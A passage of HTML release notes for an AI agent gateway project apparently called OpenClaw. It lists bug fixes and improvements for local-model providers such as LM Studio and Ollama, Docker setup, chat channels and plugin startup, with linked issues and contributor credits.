<li>Control UI: make explicit Reload Config actions discard stale local config edits while passive refreshes and failed-save recovery keep pending drafts intact. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4042433661" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40352" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40352/hovercard" href="https://github.com/openclaw/openclaw/issues/40352">#40352</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4042843645" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40443" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/40443/hovercard" href="https://github.com/openclaw/openclaw/pull/40443">#40443</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/realmikechong-dotcom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/realmikechong-dotcom">@realmikechong-dotcom</a>.</li>
<li>Agents/Bedrock: stop heartbeat runs from persisting blank user transcript turns and repair existing blank user text messages before replay, preventing AWS Bedrock <code>ContentBlock</code> blank-text validation failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333504705" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72640" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72640/hovercard" href="https://github.com/openclaw/openclaw/issues/72640">#72640</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333358856" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72622" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72622/hovercard" href="https://github.com/openclaw/openclaw/issues/72622">#72622</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/goldzulu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/goldzulu">@goldzulu</a>.</li>
<li>Agents/LM Studio: promote standalone bracketed local-model tool requests into registered tool calls and hide unsupported bracket blocks from visible replies, so MemPalace MCP lookups do not print raw <code>[tool]</code> JSON scaffolding in chat. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4258167996" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66178" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66178/hovercard" href="https://github.com/openclaw/openclaw/issues/66178">#66178</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/detroit357/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/detroit357">@detroit357</a>.</li>
<li>Local models: warn when an assistant reply looks like a tool call but the provider emitted plain text instead of a structured tool invocation, making fake/non-executed tool calls visible in logs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4110625662" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51332" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51332/hovercard" href="https://github.com/openclaw/openclaw/issues/51332">#51332</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/emilclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/emilclaw">@emilclaw</a>.</li>
<li>Local models: accept persisted non-secret local auth markers for private-LAN custom OpenAI-compatible providers, so LAN Ollama configs no longer fail with missing auth when <code>ollama-local</code> is saved as the key. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4094215279" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49736" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49736/hovercard" href="https://github.com/openclaw/openclaw/issues/49736">#49736</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/charles-zh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/charles-zh">@charles-zh</a>.</li>
<li>TUI/local models: treat visible gateway client labels such as <code>openclaw-tui</code> as the current requester session for session-aware tools, so Ollama tool calls no longer fail by resolving the UI label as a session id. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4260076318" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66391" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66391/hovercard" href="https://github.com/openclaw/openclaw/issues/66391">#66391</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kickingzebra/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kickingzebra">@kickingzebra</a>.</li>
<li>Local models: route self-hosted OpenAI-compatible model discovery through the guarded fetch path pinned to the configured host, covering vLLM and SGLang setup without reopening local/LAN SSRF probes. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4076198483" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46359" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/46359/hovercard" href="https://github.com/openclaw/openclaw/pull/46359">#46359</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cdxiaodong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cdxiaodong">@cdxiaodong</a>.</li>
<li>Local models: classify terminated, reset, closed, timeout, and aborted model-call failures and attach a process memory snapshot to the diagnostic event, making LM Studio/Ollama RAM-pressure failures easier to prove from stability bundles. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4249906273" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65551" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65551/hovercard" href="https://github.com/openclaw/openclaw/issues/65551">#65551</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BigWiLLi111/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BigWiLLi111">@BigWiLLi111</a>.</li>
<li>Local models: pass configured provider request timeouts through OpenAI SDK transports and the model idle watchdog so long-running local or custom OpenAI-compatible streams use one timeout knob instead of hitting the SDK's 10-minute default or the 120s idle default. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4231111693" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63663" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63663/hovercard" href="https://github.com/openclaw/openclaw/issues/63663">#63663</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aidiffuser/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aidiffuser">@aidiffuser</a>.</li>
<li>LM Studio: trust configured LM Studio loopback, LAN, and tailnet endpoints for guarded model requests by default, preserving explicit private-network opt-outs. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4205504518" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60994" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60994/hovercard" href="https://github.com/openclaw/openclaw/issues/60994">#60994</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tnowakow/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tnowakow">@tnowakow</a>.</li>
<li>Docker/setup: route Docker onboarding defaults for host-side LM Studio and Ollama through <code>host.docker.internal</code> and add the Linux host-gateway mapping to the bundled Compose file, so containerized gateways can reach local providers without using container loopback. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289073782" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68684" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68684/hovercard" href="https://github.com/openclaw/openclaw/issues/68684">#68684</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289314253" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68702" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68702/hovercard" href="https://github.com/openclaw/openclaw/pull/68702">#68702</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/safrano9999/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/safrano9999">@safrano9999</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/skolez/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/skolez">@skolez</a>.</li>
<li>Agents/LM Studio: strip prior-turn Gemma 4 reasoning from OpenAI-compatible replay while preserving active tool-call continuation reasoning. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289319395" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68704" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68704/hovercard" href="https://github.com/openclaw/openclaw/issues/68704">#68704</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chip-snomo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chip-snomo">@chip-snomo</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kailigithub/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kailigithub">@Kailigithub</a>.</li>
<li>LM Studio: allow interactive onboarding to leave the API key blank for unauthenticated local servers, using local synthetic auth while clearing stale LM Studio auth profiles. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265841731" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66937" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66937/hovercard" href="https://github.com/openclaw/openclaw/issues/66937">#66937</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/olamedia/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/olamedia">@olamedia</a>.</li>
<li>Plugins/startup/registry: reuse a Gateway <code>PluginLookUpTable</code> and one manifest registry pass across startup plugin IDs, plugin loading, deferred channel reloads, model pricing, read-only channel defaults, capability/provider/media resolution, manifest contracts, extractors, web fallback discovery, owner maps, and cold provider-discovery caches, with new startup-trace timing/count metrics for installed-index, manifest, startup-plan, and owner-map work. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mcaxtr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mcaxtr">@mcaxtr</a>.</li>
<li>Mattermost: keep direct-message replies top-level by suppressing reply roots for DM delivery while preserving channel and group thread roots, and derive inbound chat kind from the trusted channel lookup instead of the websocket event channel type. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4198774864" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60115" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60115/hovercard" href="https://github.com/openclaw/openclaw/pull/60115">#60115</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4144047176" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55186" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/55186/hovercard" href="https://github.com/openclaw/openclaw/pull/55186">#55186</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331558573" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72305" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72305/hovercard" href="https://github.com/openclaw/openclaw/pull/72305">#72305</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333662921" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72659" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72659/hovercard" href="https://github.com/openclaw/openclaw/pull/72659">#72659</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4195267865" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59758" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59758/hovercard" href="https://github.com/openclaw/openclaw/issues/59758">#59758</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4197726401" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59981" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59981/hovercard" href="https://github.com/openclaw/openclaw/issues/59981">#59981</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4195702082" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59791" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/59791/hovercard" href="https://github.com/openclaw/openclaw/pull/59791">#59791</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4168354725" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57565" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/57565/hovercard" href="https://github.com/openclaw/openclaw/pull/57565">#57565</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jwchmodx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jwchmodx">@jwchmodx</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hnykda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hnykda">@hnykda</a>.</li>
<li>Docker: pre-create <code>/home/node/.openclaw</code> with node ownership and private permissions so first-run Docker Compose named volumes no longer fail startup with EACCES. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4081165640" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48072" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48072/hovercard" href="https://github.com/openclaw/openclaw/pull/48072">#48072</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4235354201" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63959" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63959/hovercard" href="https://github.com/openclaw/openclaw/pull/63959">#63959</a>; fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4207166215" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61279" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61279/hovercard" href="https://github.com/openclaw/openclaw/issues/61279">#61279</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/timoxue/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/timoxue">@timoxue</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jeanibarz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jeanibarz">@jeanibarz</a>.</li>
<li>CLI/Gateway: treat local restart probe policy closes for connect, exact <code>device required</code>, pairing, and auth failures as Gateway reachability proof without accepting empty, broad standalone token/password/scope/role, or pair-substring 1008 close reasons. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4086431078" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48771" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48771/hovercard" href="https://github.com/openclaw/openclaw/issues/48771">#48771</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4086615069" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48801" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48801/hovercard" href="https://github.com/openclaw/openclaw/pull/48801">#48801</a>; related <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4228912213" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63491" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63491/hovercard" href="https://github.com/openclaw/openclaw/issues/63491">#63491</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MarsDoge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MarsDoge">@MarsDoge</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/genoooool/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/genoooool">@genoooool</a>.</li>
<li>Feishu: send outgoing interactive reply payloads as native cards with clickable buttons while preserving text, media, and document-comment fallbacks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3919571266" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/13175" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/13175/hovercard" href="https://github.com/openclaw/openclaw/issues/13175">#13175</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4177896611" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58298" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58298/hovercard" href="https://github.com/openclaw/openclaw/issues/58298">#58298</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4080155978" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47891" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/47891/hovercard" href="https://github.com/openclaw/openclaw/pull/47891">#47891</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Horacehxw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Horacehxw">@Horacehxw</a>.</li>
<li>Process/Windows: decode command stdout and stderr from raw bytes with console-codepage awareness, while preserving valid UTF-8 output and multibyte characters split across chunks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4102777975" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50519" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50519/hovercard" href="https://github.com/openclaw/openclaw/issues/50519">#50519</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iready/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iready">@iready</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kevinten10/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kevinten10">@kevinten10</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangyongjie1997/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangyongjie1997">@zhangyongjie1997</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/knightplat-blip/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/knightplat-blip">@knightplat-blip</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/heiqishi666/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/heiqishi666">@heiqishi666</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/slepybear/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slepybear">@slepybear</a>.</li>
<li>Bonjour/Windows: hide the bundled mDNS advertiser's Windows ARP shell probe so Gateway startup no longer flashes command-prompt windows. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4310157936" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70238" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70238/hovercard" href="https://github.com/openclaw/openclaw/issues/70238">#70238</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexandre-leng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexandre-leng">@alexandre-leng</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PratikRai0101/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PratikRai0101">@PratikRai0101</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/infinitypacific/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/infinitypacific">@infinitypacific</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tomerpeled/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tomerpeled">@tomerpeled</a>.</li>
<li>Agents/bootstrap: dedupe hook-injected bootstrap context files by workspace-relative path and store normalized resolved paths so duplicate relative and absolute hook paths no longer depend on the process cwd. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4190963394" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59344" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/59344/hovercard" href="https://github.com/openclaw/openclaw/pull/59344">#59344</a>; fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4190804191" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59319" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59319/hovercard" href="https://github.com/openclaw/openclaw/issues/59319">#59319</a>; related <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4162233538" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56721" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/56721/hovercard" href="https://github.com/openclaw/openclaw/pull/56721">#56721</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4162249580" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56725" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/56725/hovercard" href="https://github.com/openclaw/openclaw/pull/56725">#56725</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4168683400" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57587" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/57587/hovercard" href="https://github.com/openclaw/openclaw/pull/57587">#57587</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/koen666/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/koen666">@koen666</a>.</li>
<li>Agents/bootstrap: refresh cached workspace bootstrap snapshots on long-lived main-session turns when <code>AGENTS.md</code>, <code>SOUL.md</code>, <code>MEMORY.md</code>, or <code>TOOLS.md</code> change on disk, while preserving unchanged snapshot identity through the workspace file cache. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245012829" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64871" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64871/hovercard" href="https://github.com/openclaw/openclaw/pull/64871">#64871</a>; related <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4063325217" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43901" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/43901/hovercard" href="https://github.com/openclaw/openclaw/pull/43901">#43901</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3989354959" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/26497" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/26497/hovercard" href="https://github.com/openclaw/openclaw/issues/26497">#26497</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4000351209" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/28594" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/28594/hovercard" href="https://github.com/openclaw/openclaw/issues/28594">#28594</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4008006931" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/30896" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/30896/hovercard" href="https://github.com/openclaw/openclaw/issues/30896">#30896</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aimqwest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aimqwest">@aimqwest</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mikejuyoon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mikejuyoon">@mikejuyoon</a>.</li>
<li>macOS Gateway: detect installed-but-unloaded LaunchAgent split-brain states during status, doctor, and restart, and re-bootstrap launchd supervision before falling back to unmanaged listener restarts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4270911583" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67335" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67335/hovercard" href="https://github.com/openclaw/openclaw/issues/67335">#67335</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4125657224" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53475" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53475/hovercard" href="https://github.com/openclaw/openclaw/issues/53475">#53475</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4322280015" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71060" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71060/hovercard" href="https://github.com/openclaw/openclaw/issues/71060">#71060</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4185336537" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58890" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58890/hovercard" href="https://github.com/openclaw/openclaw/issues/58890">#58890</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204966968" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60885" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60885/hovercard" href="https://github.com/openclaw/openclaw/issues/60885">#60885</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319157550" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70801" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70801/hovercard" href="https://github.com/openclaw/openclaw/issues/70801">#70801</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ze1tgeist88/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ze1tgeist88">@ze1tgeist88</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dafacto/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dafacto">@dafacto</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vishutdhar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vishutdhar">@vishutdhar</a>.</li>
<li>Plugins/install: treat mirrored core logger dependencies as staged bundled runtime deps so packaged Gateway starts do not crash when the external plugin-runtime-deps root is missing <code>tslog</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331181809" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72228" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72228/hovercard" href="https://github.com/openclaw/openclaw/issues/72228">#72228</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332620459" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72493" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72493/hovercard" href="https://github.com/openclaw/openclaw/pull/72493">#72493</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/deepujain/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/deepujain">@deepujain</a>.</li>
<li>Build/plugins: preserve active bundled runtime-dependency staging temp directories owned by live build processes so overlapping postbuild runs no longer delete each other's staged deps mid-prune. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331140342" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72220" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72220/hovercard" href="https://github.com/openclaw/openclaw/pull/72220">#72220</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/VACInc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/VACInc">@VACInc</a>.</li>
